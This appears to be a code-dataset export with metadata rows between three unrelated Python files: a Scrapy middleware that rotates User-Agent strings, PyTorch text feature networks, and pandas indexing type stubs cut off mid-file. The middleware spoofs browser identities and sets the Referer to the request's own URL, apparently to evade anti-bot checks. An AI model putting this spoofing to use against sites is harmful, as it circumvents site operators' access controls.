        "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
        "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
        "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
        "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36",
        "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36",
        "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36",
        "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36",
        "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36",
        "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F",
        "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1",
        "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0",
        "Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0",
        "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0",
        "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0",
        "Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16",
        "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14",
        "Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14",
        "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14",
        "Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00"
    ]

    def process_request(self, request, spider):
        """Set a random User-Agent (and a Referer) on the outgoing request.

        Original comment translated: "dynamically and randomly set the
        User-agent". ``setdefault`` keeps any header already present.
        """
        ua = random.choice(self.UserAgent_List)
        if ua:
            request.headers.setdefault('User-Agent', ua)
            # NOTE(review): Referer is set to the request's *own* URL —
            # presumably deliberate (anti-bot evasion); confirm intended.
            request.headers.setdefault('Referer', request.url)
            # print(request.headers)
| 68.517241
| 130
| 0.660795
| 709
| 3,974
| 3.686883
| 0.174894
| 0.082249
| 0.10329
| 0.176741
| 0.761285
| 0.731064
| 0.707728
| 0.690513
| 0.656465
| 0.603673
| 0
| 0.227148
| 0.1769
| 3,974
| 57
| 131
| 69.719298
| 0.571996
| 0.014092
| 0
| 0.047619
| 0
| 0.785714
| 0.811912
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02381
| false
| 0
| 0.02381
| 0
| 0.095238
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2d467aee6e6d0847d50d877cd5e31e2b59ed6f9c
| 13,206
|
py
|
Python
|
kme/models/text_featurenets.py
|
phineasng/FLAN
|
84c0fb7ea57d5730eb19fdaa25d705a4ec7490c9
|
[
"Apache-2.0"
] | null | null | null |
kme/models/text_featurenets.py
|
phineasng/FLAN
|
84c0fb7ea57d5730eb19fdaa25d705a4ec7490c9
|
[
"Apache-2.0"
] | null | null | null |
kme/models/text_featurenets.py
|
phineasng/FLAN
|
84c0fb7ea57d5730eb19fdaa25d705a4ec7490c9
|
[
"Apache-2.0"
] | null | null | null |
import torch
from torch import nn
from kme.models.base import create_sinusoidal_positional_embeddings
from kme.data.text_classification import PAD_TOKEN
from kme.models.base import FeatureNetBase
class TextFeatNet1(FeatureNetBase):
    """Basic text feature network.

    Token embeddings are pushed through a 4-layer LeakyReLU MLP
    (emb_dim -> 1024 -> 2048 -> 512 -> latent_dim) and multiplied
    element-wise by fixed sinusoidal positional embeddings.
    """

    def __init__(self, emb_dim, latent_dim, vocabulary, max_sentence_len, device='cpu'):
        # emb_dim: token-embedding size. latent_dim: output feature size.
        # vocabulary: must support len() and get_stoi(); NOTE(review): it is
        # mutated in place (a ``stoi`` attribute is attached) — confirm intended.
        # max_sentence_len: length of the positional-embedding table.
        super().__init__()
        self._emb_dim = emb_dim
        self._latent_dim = latent_dim
        self._vocab = vocabulary
        self._vocab.stoi = self._vocab.get_stoi()
        self._max_len = max_sentence_len
        self._embeddings = nn.Embedding(len(self._vocab), embedding_dim=self._emb_dim,
                                        padding_idx=self._vocab.stoi[PAD_TOKEN])
        self._pos_embeddings = create_sinusoidal_positional_embeddings(
            self._max_len, self._latent_dim).to(device)
        self._feature_encoder = nn.Sequential(
            nn.Linear(self._emb_dim, 1024),
            nn.LeakyReLU(),
            nn.Linear(1024, 2048),
            nn.LeakyReLU(),
            nn.Linear(2048, 512),
            nn.LeakyReLU(),
            nn.Linear(512, self._latent_dim),
            nn.LeakyReLU(),
        )

    def process_samples(self, s):
        """Embed token ids, encode, and scale by positional embeddings."""
        # s: assumed (batch, max_len) tensor of token ids — TODO confirm.
        s = self._embeddings(s)
        s = self._feature_encoder(s)*(self._pos_embeddings.to(s.device))
        return s
class TextFeatNet2(FeatureNetBase):
    """Basic text feature network.

    Like TextFeatNet1 but with a shallower MLP (emb_dim -> 2048 -> 512 ->
    latent_dim, with dropout) and positional embeddings *added* rather
    than multiplied.
    """

    def __init__(self, emb_dim, latent_dim, vocabulary, max_sentence_len, device='cpu'):
        # NOTE(review): vocabulary is mutated in place (``stoi`` attached).
        super().__init__()
        self._emb_dim = emb_dim
        self._latent_dim = latent_dim
        self._vocab = vocabulary
        self._vocab.stoi = self._vocab.get_stoi()
        self._max_len = max_sentence_len
        self._embeddings = nn.Embedding(len(self._vocab), embedding_dim=self._emb_dim,
                                        padding_idx=self._vocab.stoi[PAD_TOKEN])
        self._pos_embeddings = create_sinusoidal_positional_embeddings(
            self._max_len, self._latent_dim).to(device)
        self._feature_encoder = nn.Sequential(
            nn.Linear(self._emb_dim, 2048),
            nn.LeakyReLU(),
            nn.Dropout(p=0.2),
            nn.Linear(2048, 512),
            nn.LeakyReLU(),
            nn.Linear(512, self._latent_dim),
            nn.LeakyReLU(),
        )

    def process_samples(self, s):
        """Embed token ids, encode, and add positional embeddings."""
        s = self._embeddings(s)
        s = self._feature_encoder(s) + (self._pos_embeddings.to(s.device))
        return s
class TextFeatNet3(FeatureNetBase):
    """Basic text feature network.

    Two-stage encoder: a first projection to 2048 dims is scaled by
    2048-dim sinusoidal positional embeddings, then a second MLP maps
    down to latent_dim.
    """

    def __init__(self, emb_dim, latent_dim, vocabulary, max_sentence_len, device='cpu'):
        # NOTE(review): vocabulary is mutated in place (``stoi`` attached).
        super().__init__()
        self._emb_dim = emb_dim
        self._latent_dim = latent_dim
        self._vocab = vocabulary
        self._vocab.stoi = self._vocab.get_stoi()
        self._max_len = max_sentence_len
        self._embeddings = nn.Embedding(len(self._vocab), embedding_dim=self._emb_dim,
                                        padding_idx=self._vocab.stoi[PAD_TOKEN])
        # Positional table sized 2048 to match the first encoder stage.
        self._pos_embeddings = create_sinusoidal_positional_embeddings(
            self._max_len, 2048).to(device)
        self._feature_encoder = nn.Sequential(
            nn.Linear(self._emb_dim, 2048),
            nn.LeakyReLU()
        )
        self._feature_encoder_2 = nn.Sequential(
            nn.Linear(2048, 1024),
            nn.LeakyReLU(),
            nn.Dropout(p=0.2),
            nn.Linear(1024, self._latent_dim),
            nn.LeakyReLU(),
        )

    def process_samples(self, s):
        """Embed, project, scale by positions, then reduce to latent_dim."""
        s = self._embeddings(s)
        s = self._feature_encoder(s)*(self._pos_embeddings.to(s.device))
        s = self._feature_encoder_2(s)
        return s
class TextFeatNet4(FeatureNetBase):
    """Basic text feature network.

    Like TextFeatNet3 but zeroes out padding-token embeddings with an
    explicit mask before encoding, and uses dropout in both stages.
    """

    def __init__(self, emb_dim, latent_dim, vocabulary, max_sentence_len, device='cpu'):
        # NOTE(review): vocabulary is mutated in place (``stoi`` attached).
        super().__init__()
        self._emb_dim = emb_dim
        self._latent_dim = latent_dim
        self._vocab = vocabulary
        self._vocab.stoi = self._vocab.get_stoi()
        self._max_len = max_sentence_len
        self._embeddings = nn.Embedding(len(self._vocab), embedding_dim=self._emb_dim,
                                        padding_idx=self._vocab.stoi[PAD_TOKEN])
        self._pos_embeddings = create_sinusoidal_positional_embeddings(
            self._max_len, 2048).to(device)
        self._feature_encoder = nn.Sequential(
            nn.Linear(self._emb_dim, 2048),
            nn.Dropout(p=0.2),
            nn.LeakyReLU()
        )
        self._feature_encoder_2 = nn.Sequential(
            nn.Linear(2048, self._latent_dim),
            nn.Dropout(p=0.2),
            nn.LeakyReLU(),
        )

    def process_samples(self, s):
        """Mask padding, embed, encode with positional scaling."""
        # Boolean mask of non-padding positions, applied by transposing so
        # the mask broadcasts over the embedding dimension.
        mask = (s != self._vocab.stoi[PAD_TOKEN])
        s = self._embeddings(s)
        s = (s.transpose(1, 2).transpose(0, 1) *
             mask).transpose(0, 1).transpose(1, 2)
        s = self._feature_encoder(s)*(self._pos_embeddings.to(s.device))
        s = self._feature_encoder_2(s)
        return s
class TextFeatNet5(FeatureNetBase):
    """Basic text feature network.

    Minimal variant: a single bias-free linear projection from the
    (padding-masked) embeddings to latent_dim, scaled by positional
    embeddings.
    """

    def __init__(self, emb_dim, latent_dim, vocabulary, max_sentence_len, device='cpu'):
        # NOTE(review): vocabulary is mutated in place (``stoi`` attached).
        super().__init__()
        self._emb_dim = emb_dim
        self._latent_dim = latent_dim
        self._vocab = vocabulary
        self._vocab.stoi = self._vocab.get_stoi()
        self._max_len = max_sentence_len
        self._embeddings = nn.Embedding(len(self._vocab), embedding_dim=self._emb_dim,
                                        padding_idx=self._vocab.stoi[PAD_TOKEN])
        self._pos_embeddings = create_sinusoidal_positional_embeddings(
            self._max_len, latent_dim).to(device)
        self._feature_encoder = nn.Linear(
            self._emb_dim, latent_dim, bias=False)

    def process_samples(self, s):
        """Mask padding, embed, project, and scale by positions."""
        mask = (s != self._vocab.stoi[PAD_TOKEN])
        s = self._embeddings(s)
        s = (s.transpose(1, 2).transpose(0, 1) *
             mask).transpose(0, 1).transpose(1, 2)
        s = self._feature_encoder(s)*(self._pos_embeddings.to(s.device))
        return s
class TextFeatNet6(FeatureNetBase):
    """Basic text feature network.

    Two-stage variant of TextFeatNet5: a bias-free projection to 2048
    dims with dropout (scaled by positions), then a second stage down
    to latent_dim.
    """

    def __init__(self, emb_dim, latent_dim, vocabulary, max_sentence_len, device='cpu'):
        # NOTE(review): vocabulary is mutated in place (``stoi`` attached).
        super().__init__()
        self._emb_dim = emb_dim
        self._latent_dim = latent_dim
        self._vocab = vocabulary
        self._vocab.stoi = self._vocab.get_stoi()
        self._max_len = max_sentence_len
        self._embeddings = nn.Embedding(len(self._vocab), embedding_dim=self._emb_dim,
                                        padding_idx=self._vocab.stoi[PAD_TOKEN])
        self._pos_embeddings = create_sinusoidal_positional_embeddings(
            self._max_len, 2048).to(device)
        self._feature_encoder = nn.Sequential(
            nn.Linear(self._emb_dim, 2048, bias=False),
            nn.Dropout(p=0.2)
        )
        self._feature_encoder_2 = nn.Sequential(
            nn.Linear(2048, self._latent_dim),
            nn.Dropout(p=0.2),
            nn.LeakyReLU(),
        )

    def process_samples(self, s):
        """Mask padding, embed, then run the two encoder stages."""
        mask = (s != self._vocab.stoi[PAD_TOKEN])
        s = self._embeddings(s)
        s = (s.transpose(1, 2).transpose(0, 1) *
             mask).transpose(0, 1).transpose(1, 2)
        s = self._feature_encoder(s)*(self._pos_embeddings.to(s.device))
        s = self._feature_encoder_2(s)
        return s
class TextFeatNet7(FeatureNetBase):
    """CNN text feature network.

    A stride-5 1-D convolution downsamples the sequence 5x, a 1x1
    convolution maps to a 1024-dim positional space, and a final linear
    stage produces latent_dim features.
    """

    def __init__(self, emb_dim, latent_dim, vocabulary, max_sentence_len, device='cpu'):
        # NOTE(review): vocabulary is mutated in place (``stoi`` attached).
        super().__init__()
        self._emb_dim = emb_dim
        self._latent_dim = latent_dim
        self._vocab = vocabulary
        self._vocab.stoi = self._vocab.get_stoi()
        self._max_len = max_sentence_len
        self._stride = 5  # sequence downsampling factor
        self._pos_dim = 1024  # channel width after the 1x1 conv
        self._conv = nn.Sequential(
            nn.Conv1d(self._emb_dim, self._emb_dim,
                      kernel_size=self._stride, stride=self._stride),
            nn.LeakyReLU(),
            nn.Dropout(p=0.2),
            nn.Conv1d(self._emb_dim, self._pos_dim, kernel_size=1, stride=1),
            nn.LeakyReLU(),
        )
        self._embeddings = nn.Embedding(len(self._vocab), embedding_dim=self._emb_dim,
                                        padding_idx=self._vocab.stoi[PAD_TOKEN])
        self._pos_embeddings = create_sinusoidal_positional_embeddings(
            self._max_len // self._stride, self._pos_dim).to(device)
        self._feature_encoder = nn.Sequential(
            nn.Linear(self._pos_dim, self._latent_dim),
            nn.Dropout(p=0.2),
            nn.LeakyReLU(),
        )

    def process_samples(self, s):
        """Embed, convolve (5x downsample), scale by positions, project."""
        s = self._embeddings(s)
        # s : B x MAX_LEN x emb_dim
        s = s.transpose(1, 2)
        # s : B x emb_dim x MAX_LEN
        s = self._conv(s)
        # s : B x pos_dim x (MAX_LEN//5)
        s = s.transpose(1, 2)
        # s : B x (MAX_LEN//5) x pos_dim
        s = s*(self._pos_embeddings.to(s.device))
        s = self._feature_encoder(s)
        # s : B x (MAX_LEN//5) x latent_dim
        return s
class TextFeatNet8(FeatureNetBase):
    """CNN text feature network.

    Identical architecture to TextFeatNet7 except the positional-space
    channel width is 32 instead of 1024.
    """

    def __init__(self, emb_dim, latent_dim, vocabulary, max_sentence_len, device='cpu'):
        # NOTE(review): vocabulary is mutated in place (``stoi`` attached).
        super().__init__()
        self._emb_dim = emb_dim
        self._latent_dim = latent_dim
        self._vocab = vocabulary
        self._vocab.stoi = self._vocab.get_stoi()
        self._max_len = max_sentence_len
        self._stride = 5  # sequence downsampling factor
        self._pos_dim = 32  # narrower channel width than TextFeatNet7
        self._conv = nn.Sequential(
            nn.Conv1d(self._emb_dim, self._emb_dim,
                      kernel_size=self._stride, stride=self._stride),
            nn.LeakyReLU(),
            nn.Dropout(p=0.2),
            nn.Conv1d(self._emb_dim, self._pos_dim, kernel_size=1, stride=1),
            nn.LeakyReLU(),
        )
        self._embeddings = nn.Embedding(len(self._vocab), embedding_dim=self._emb_dim,
                                        padding_idx=self._vocab.stoi[PAD_TOKEN])
        self._pos_embeddings = create_sinusoidal_positional_embeddings(
            self._max_len // self._stride, self._pos_dim).to(device)
        self._feature_encoder = nn.Sequential(
            nn.Linear(self._pos_dim, self._latent_dim),
            nn.Dropout(p=0.2),
            nn.LeakyReLU(),
        )

    def process_samples(self, s):
        """Embed, convolve (5x downsample), scale by positions, project."""
        s = self._embeddings(s)
        # s : B x MAX_LEN x emb_dim
        s = s.transpose(1, 2)
        # s : B x emb_dim x MAX_LEN
        s = self._conv(s)
        # s : B x pos_dim x (MAX_LEN//5)
        s = s.transpose(1, 2)
        # s : B x (MAX_LEN//5) x pos_dim
        s = s*(self._pos_embeddings.to(s.device))
        s = self._feature_encoder(s)
        # s : B x (MAX_LEN//5) x latent_dim
        return s
class TextFeatNet9(FeatureNetBase):
    """CNN text feature network.

    Deeper variant of TextFeatNet8: the stride-5 downsampling conv is
    followed by a stack of 1x1 convolutions before mapping into the
    32-dim positional space; the final linear stage has no dropout.
    """

    def __init__(self, emb_dim, latent_dim, vocabulary, max_sentence_len, device='cpu'):
        # NOTE(review): vocabulary is mutated in place (``stoi`` attached).
        super().__init__()
        self._emb_dim = emb_dim
        self._latent_dim = latent_dim
        self._vocab = vocabulary
        self._vocab.stoi = self._vocab.get_stoi()
        self._max_len = max_sentence_len
        self._stride = 5  # sequence downsampling factor
        self._pos_dim = 32
        self._conv = nn.Sequential(
            nn.Conv1d(self._emb_dim, self._emb_dim,
                      kernel_size=self._stride, stride=self._stride),
            nn.LeakyReLU(),
            nn.Dropout(p=0.2),
            nn.Conv1d(self._emb_dim, self._emb_dim, kernel_size=1, stride=1),
            nn.LeakyReLU(),
            nn.Conv1d(self._emb_dim, self._emb_dim, kernel_size=1, stride=1),
            nn.LeakyReLU(),
            nn.Dropout(p=0.2),
            nn.Conv1d(self._emb_dim, self._emb_dim, kernel_size=1, stride=1),
            nn.LeakyReLU(),
            nn.Conv1d(self._emb_dim, self._pos_dim, kernel_size=1, stride=1),
            nn.LeakyReLU(),
            nn.Dropout(p=0.2),
        )
        self._embeddings = nn.Embedding(len(self._vocab), embedding_dim=self._emb_dim,
                                        padding_idx=self._vocab.stoi[PAD_TOKEN])
        self._pos_embeddings = create_sinusoidal_positional_embeddings(
            self._max_len // self._stride, self._pos_dim).to(device)
        self._feature_encoder = nn.Sequential(
            nn.Linear(self._pos_dim, self._latent_dim),
            nn.LeakyReLU(),
        )

    def process_samples(self, s):
        """Embed, run the deep conv stack, scale by positions, project."""
        s = self._embeddings(s)
        # s : B x MAX_LEN x emb_dim
        s = s.transpose(1, 2)
        # s : B x emb_dim x MAX_LEN
        s = self._conv(s)
        # s : B x pos_dim x (MAX_LEN//5)
        s = s.transpose(1, 2)
        # s : B x (MAX_LEN//5) x pos_dim
        s = s*(self._pos_embeddings.to(s.device))
        # s : B x (MAX_LEN//5) x latent_dim
        s = self._feature_encoder(s)
        return s
| 34.752632
| 88
| 0.595184
| 1,686
| 13,206
| 4.297153
| 0.048043
| 0.052174
| 0.066253
| 0.034783
| 0.941891
| 0.929331
| 0.927674
| 0.926294
| 0.921187
| 0.912629
| 0
| 0.022146
| 0.292216
| 13,206
| 379
| 89
| 34.844327
| 0.752969
| 0.051567
| 0
| 0.826087
| 0
| 0
| 0.002182
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065217
| false
| 0
| 0.018116
| 0
| 0.148551
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
740f279d3f1d871db45a018bda605fa7b5d1c1d4
| 43,523
|
py
|
Python
|
data/typing/pandas.core.indexing.py
|
vfdev-5/python-record-api
|
006faf0bba9cd4cb55fbacc13d2bbda365f5bf0b
|
[
"MIT"
] | null | null | null |
data/typing/pandas.core.indexing.py
|
vfdev-5/python-record-api
|
006faf0bba9cd4cb55fbacc13d2bbda365f5bf0b
|
[
"MIT"
] | null | null | null |
data/typing/pandas.core.indexing.py
|
vfdev-5/python-record-api
|
006faf0bba9cd4cb55fbacc13d2bbda365f5bf0b
|
[
"MIT"
] | null | null | null |
from typing import *
class IndexingError:
    """Typing stub mirroring ``pandas.core.indexing.IndexingError``."""
class _LocIndexer:
@overload
def __getitem__(self, _0: cftime._cftime.DatetimeNoLeap, /):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(self, _0: Literal["0001"], /):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(
self,
_0: slice[Literal["0001-01-01"], Literal["0001-12-30"], Literal["0001-01-01"]],
/,
):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(self, _0: slice[None, Literal["0001-12-30"], None], /):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(
self,
_0: slice[
cftime._cftime.DatetimeNoLeap,
cftime._cftime.DatetimeNoLeap,
cftime._cftime.DatetimeNoLeap,
],
/,
):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(self, _0: slice[None, cftime._cftime.DatetimeNoLeap, None], /):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(self, _0: cftime._cftime.Datetime360Day, /):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(
self,
_0: slice[
cftime._cftime.Datetime360Day,
cftime._cftime.Datetime360Day,
cftime._cftime.Datetime360Day,
],
/,
):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(self, _0: slice[None, cftime._cftime.Datetime360Day, None], /):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(self, _0: cftime._cftime.DatetimeJulian, /):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(
self,
_0: slice[
cftime._cftime.DatetimeJulian,
cftime._cftime.DatetimeJulian,
cftime._cftime.DatetimeJulian,
],
/,
):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(self, _0: slice[None, cftime._cftime.DatetimeJulian, None], /):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(self, _0: cftime._cftime.DatetimeAllLeap, /):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(
self,
_0: slice[
cftime._cftime.DatetimeAllLeap,
cftime._cftime.DatetimeAllLeap,
cftime._cftime.DatetimeAllLeap,
],
/,
):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(self, _0: slice[None, cftime._cftime.DatetimeAllLeap, None], /):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(self, _0: cftime._cftime.DatetimeGregorian, /):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(
self,
_0: slice[
cftime._cftime.DatetimeGregorian,
cftime._cftime.DatetimeGregorian,
cftime._cftime.DatetimeGregorian,
],
/,
):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(self, _0: slice[None, cftime._cftime.DatetimeGregorian, None], /):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(self, _0: cftime._cftime.DatetimeProlepticGregorian, /):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(
self,
_0: slice[
cftime._cftime.DatetimeProlepticGregorian,
cftime._cftime.DatetimeProlepticGregorian,
cftime._cftime.DatetimeProlepticGregorian,
],
/,
):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(
self, _0: slice[None, cftime._cftime.DatetimeProlepticGregorian, None], /
):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], List[Literal["x", "a"]]], /
):
"""
usage.xarray: 1
"""
...
@overload
def __getitem__(self, _0: numpy.ndarray, /):
"""
usage.dask: 3
usage.sklearn: 1
usage.xarray: 2
"""
...
@overload
def __getitem__(self, _0: pandas.core.indexes.base.Index, /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[None, None, None], /):
"""
usage.dask: 3
"""
...
@overload
def __getitem__(self, _0: slice[None, int, None], /):
"""
usage.dask: 4
"""
...
@overload
def __getitem__(self, _0: slice[Literal["E"], Literal["g"], Literal["E"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["g"], Literal["h"], Literal["g"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["a"], Literal["f"], Literal["a"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["f"], Literal["j"], Literal["f"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["j"], Literal["k"], Literal["j"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["a"], Literal["b"], Literal["a"]], /):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: slice[Literal["b"], Literal["f"], Literal["b"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["f"], Literal["k"], Literal["f"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["b"], Literal["d"], Literal["b"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["d"], Literal["f"], Literal["d"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["f"], Literal["h"], Literal["f"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["h"], Literal["k"], Literal["h"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["h"], Literal["j"], Literal["h"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["A"], Literal["a"], Literal["A"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["a"], Literal["a"], Literal["a"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["e"], Literal["f"], Literal["e"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["a"], Literal["e"], Literal["a"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[int, int, int], /):
"""
usage.dask: 16
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], List[Literal["d", "c"]]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], List[Literal["f", "d", "c"]]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], List[Literal["g", "d", "c"]]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], List[Literal["g", "f", "d", "c"]]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], List[Literal["g", "f"]]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: List[int], /):
"""
usage.dask: 8
"""
...
@overload
def __getitem__(self, _0: slice[int, numpy.int64, int], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[numpy.int64, numpy.int64, numpy.int64], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[numpy.int64, int, numpy.int64], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: float, /):
"""
usage.dask: 4
"""
...
@overload
def __getitem__(self, _0: slice[Literal["a"], Literal["d"], Literal["a"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["d"], Literal["g"], Literal["d"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[numpy.float64, float, numpy.float64], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[float, numpy.float64, float], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[float, float, float], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: slice[
pandas._libs.tslibs.timestamps.Timestamp,
pandas._libs.tslibs.timestamps.Timestamp,
pandas._libs.tslibs.timestamps.Timestamp,
],
/,
):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: slice[Literal["A"], Literal["b"], Literal["A"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["b"], Literal["g"], Literal["b"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["g"], Literal["l"], Literal["g"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["l"], Literal["q"], Literal["l"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["q"], Literal["v"], Literal["q"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["v"], Literal["z"], Literal["v"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: List[Literal["x"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: List[Literal["z", "y"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self, _0: slice[None, pandas._libs.tslibs.timestamps.Timestamp, None], /
):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(
self,
_0: slice[
pandas._libs.tslibs.timestamps.Timestamp,
None,
pandas._libs.tslibs.timestamps.Timestamp,
],
/,
):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: slice[None, Literal["02.02.2015"], None], /):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(
self, _0: slice[Literal["02.02.2015"], None, Literal["02.02.2015"]], /
):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: slice[int, None, int], /):
"""
usage.dask: 5
"""
...
@overload
def __getitem__(self, _0: list, /):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: pandas.core.series.Series, /):
"""
usage.dask: 5
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], slice[None, None, None]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[Callable, slice[None, None, None]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[pandas.core.series.Series, slice[None, None, None]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], Callable], /):
"""
